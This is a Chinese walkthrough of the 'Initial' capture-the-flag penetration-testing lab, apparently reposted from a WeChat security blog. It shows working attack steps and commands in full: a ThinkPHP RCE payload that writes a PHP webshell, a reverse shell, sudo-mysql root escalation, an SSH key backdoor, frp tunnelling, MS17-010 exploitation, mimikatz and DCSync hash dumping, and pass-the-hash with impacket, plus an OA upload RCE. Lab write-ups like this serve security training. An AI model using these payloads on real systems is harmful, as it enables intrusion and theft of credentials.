2023年7月26日18:05:38评论47 views字数 4309阅读14分21秒阅读模式

靶标介绍：

Initial是一套难度为简单的靶场环境，完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag，各部分位于不同的机器上。

【渗透测试】春秋云镜靶场-Initial

payload：

http://39.xx.xx.xx/index.php?s=captcha
POST:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '%3C%3Fphp+%40eval%28%24_POST%5B1%5D%29%3B%3F%3E' >1231.php

此时已写入成功

【渗透测试】春秋云镜靶场-Initial 拿到权限进行主机信息收集

运行

curl ip.sb

【渗透测试】春秋云镜靶场-Initial 发现目标出网 ,准备反弹shell

去 https://www.revshells.com/ 生成下反弹shell

反弹成功

【渗透测试】春秋云镜靶场-Initial

sudo -l 查看到可以 NOPASSWD执行 mysqlmysql是可以执行系统命令的，我们可以用此方法提权到root 【渗透测试】春秋云镜靶场-Initial

sudo /usr/bin/mysql -e '! bash -i'

【渗透测试】春秋云镜靶场-Initial

cat /root/flag/flag01.txt

于是便拿到了第一个flag 【渗透测试】春秋云镜靶场-Initial

flag01: flag{60b53231-

netstat -ntpl发现目标开启了ssh于是我们可以在不修改ssh密码的情况下写入公钥进行远程ssh 【渗透测试】春秋云镜靶场-Initial

生成rsa密钥

ssh-keygen -t rsa

【渗透测试】春秋云镜靶场-Initial

于是将生成id_rsa.pub写入到目标.ssh目录下并命名为authorized_keys

echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC09OeRl9NEQd/QfCp6aYdQN8wBXJxfZT93KHLaHkA5QghDSYnIzLtQROGZNmRaqyd3hasL0hIC9GKxsaC8JLo0ntUe7RQRyfDGnO00j6V7eqi7kzHgxg0Kjpuz5O0wtbmQz6Ibr7KquI0y/770OE1Ma68aTNXxhDY3/zoji5BnBSre+JvPrNiQlJW2fS6MjAz3xZ4T/cJ55LEIQHoJrsUx1xzu6dzlnYlWwPQsh9Ca59xzpecRagkVxCLX2q6fU6edh7M0sP11XT+lqPye0J/x7jN9ChY70BjZrAYsP2CmmU93yHWrV7sT2yBfpq5QPBTjyz/N+D7xLi8ZKEO4jzWS1E0ll0DOvwrKS11+g6Jfx3bPINOoteUcCM0wLl58drov91PIlRlPD5q1e/j5ngfKYZ4gUSzFgXxMQySa7D8zqX5w9OpxeYO2Og2uE6eYGE7Y7a9inaRvI2dfcPpa8YlMhz+wvJ5yKM9oewFCz9qaS6KWBVmdoxtCEFakbGRvT6c= ubuntu@VM-20-4-ubuntu' >>authorized_keys

成功的登录【渗透测试】春秋云镜靶场-Initial

wget https://github.com/shadow1ng/fscan/releases/download/1.8.2/fscan_amd64 -O fscan

下载fscan进行内网扫描

start infoscan(icmp) Target 172.22.1.15     is alive(icmp) Target 172.22.1.2      is alive(icmp) Target 172.22.1.18     is alive(icmp) Target 172.22.1.21     is alive[*] Icmp alive hosts len is: 4172.22.1.18:80 open172.22.1.15:80 open172.22.1.15:22 open172.22.1.18:3306 open172.22.1.2:88 open172.22.1.21:445 open172.22.1.18:445 open172.22.1.2:445 open172.22.1.21:139 open172.22.1.18:139 open172.22.1.2:139 open172.22.1.21:135 open172.22.1.18:135 open172.22.1.2:135 open[*] alive ports len is: 14start vulscan[*] NetInfo:[*]172.22.1.18   [->]XIAORANG-OA01   [->]172.22.1.18[*] NetInfo:[*]172.22.1.21   [->]XIAORANG-WIN7   [->]172.22.1.21[*] NetInfo:[*]172.22.1.2   [->]DC01   [->]172.22.1.2[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)[*] WebTitle: http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin[*] NetBios: 172.22.1.2      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393[+] 172.22.1.21 MS17-010        (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)[*] NetBios: 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1[*] NetBios: 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600[*] WebTitle: http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

使用frp代理搭建socks5隧道进入内网项目地址：https://github.com/fatedier/frpclient-frpc.ini:

[common]server_addr = 175.xxx.xxx.xxxserver_port = 7000

[socks_proxy]type = tcpremote_port =8886plugin = socks5

server-frps.ini:

[common]bind_port = 7000

公网上用python开启服务器python3 -m http.server 8081用wget传入目标

wget 175.xx.xx.xx:8081/frpcwget 175.xx.xx.xx:8081/frpc.inichmod +x frpc./frpc -c ./frpc.ini

【渗透测试】春秋云镜靶场-Initial

server 端

 ./frps -c ./frps.ini

【渗透测试】春秋云镜靶场-Initial

下载代理工具准备连入目标内网我这里用的是Proxifier Proxifier官网：https://www.proxifier.com/ 【渗透测试】春秋云镜靶场-Initial

代理规则就按他目标的网卡填【渗透测试】春秋云镜靶场-Initial

【渗透测试】春秋云镜靶场-Initial

根据上面扫到的内容有个ms17-010我们先看这个代理搭建好后可以直接在本地使用msf进行攻击这里一定要注意

set payload windows/x64/meterpreter/bind_tcp

因为我的攻击端不在公网在内网，无法反弹，只能使用bind去连接利用成功【渗透测试】春秋云镜靶场-Initial

抓密码

load kiwicreds_all

【渗透测试】春秋云镜靶场-Initial

msv credentials===============
Username        Domain    NTLM                              SHA1--------        ------    ----                              ----XIAORANG-WIN7$  XIAORANG  a6c523c572328ef6e6774897553e267d  aef8b7c819cf76cc1f1378ac6d766705ad7666fa

本机上有个域内机器账户也是说system权限，具备访问域控的能力上bloodhound进行域内信息收集上传 SharpHound.exe 【渗透测试】春秋云镜靶场-Initial

SharpHound.exe -c all

收集信息【渗透测试】春秋云镜靶场-Initial 收集完成之后会生成到本地

download C:/20230711170201_BloodHound.zip

上传后打开我们可以看到这台 WIN7是有权限DCSync的【渗透测试】春秋云镜靶场-Initial 比较巧的是打进去的win7就是这台

ipconfig /all 拿到domain域名xiaorang.lab

【渗透测试】春秋云镜靶场-Initial

使用

kiwi_cmd lsadump::dcsync /all /csv

即可dump所有用户hash

【渗透测试】春秋云镜靶场-Initial

使用wmiexec访问域控

impacket-wmiexec      xiaorang.lab/administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8

拿到了第三个flag 【渗透测试】春秋云镜靶场-Initial

flag03: e8f88d0d43d6}

内网还一个信呼OA可以从web打进去，也可以直接用我们获取到的管理员hash进行登录

impacket-wmiexec      xiaorang.lab/administrator@172.22.1.18 -hashes :10cf89a850fb1cdbe6bb432b859164c8

【渗透测试】春秋云镜靶场-Initial 拿下第二个flag

flag02: 2ce3-4813-87d4-

域内也就这三个,拼接之后如下

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

紧接着我们继续来看看信呼的web怎么打【渗透测试】春秋云镜靶场-Initial 弱口令直接进入后台adminadmin123找一处地方上传

获取他的id 【渗透测试】春秋云镜靶场-Initial

上传之后留意他的id以及他的filepath

先生成缓存http://172.22.1.18/task.php?m=qcloudCos|runt&a=run&fileid={id}然后在访问http://172.22.1.18/{filepath}.php即可RCE

【渗透测试】春秋云镜靶场-Initial

这个web还一个打法是phpmyadmin访问路径/phpmyadmin账号密码 root root就是最基础的phpmyamin 日志 getshell绝对路径可以通过信呼拿到

http://172.22.1.18/?p=basejm_

【渗透测试】春秋云镜靶场-Initial

方法很多，这里就不展开讲解了

原文始发于微信公众号（暗魂攻防实验室）：【渗透测试】春秋云镜靶场-Initial

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【渗透测试】春秋云镜靶场-Initial

靶标介绍：

对抗性机器学习-攻击和缓解的分类和术语（三）

记一次带学员渗透母校

Nosql注入学习记录

SQL注入漏洞实战

基于K8s日志审计实现攻击行为检测

Dr4g0n b4ll_1

XSS目前Web中的另类利用场景和绕Waf的Payload分享|挖洞技巧

文件上传黑名单限制的绕过总结

metasploit（1）生成远控木马

Ghost

发表评论

在线咨询

微信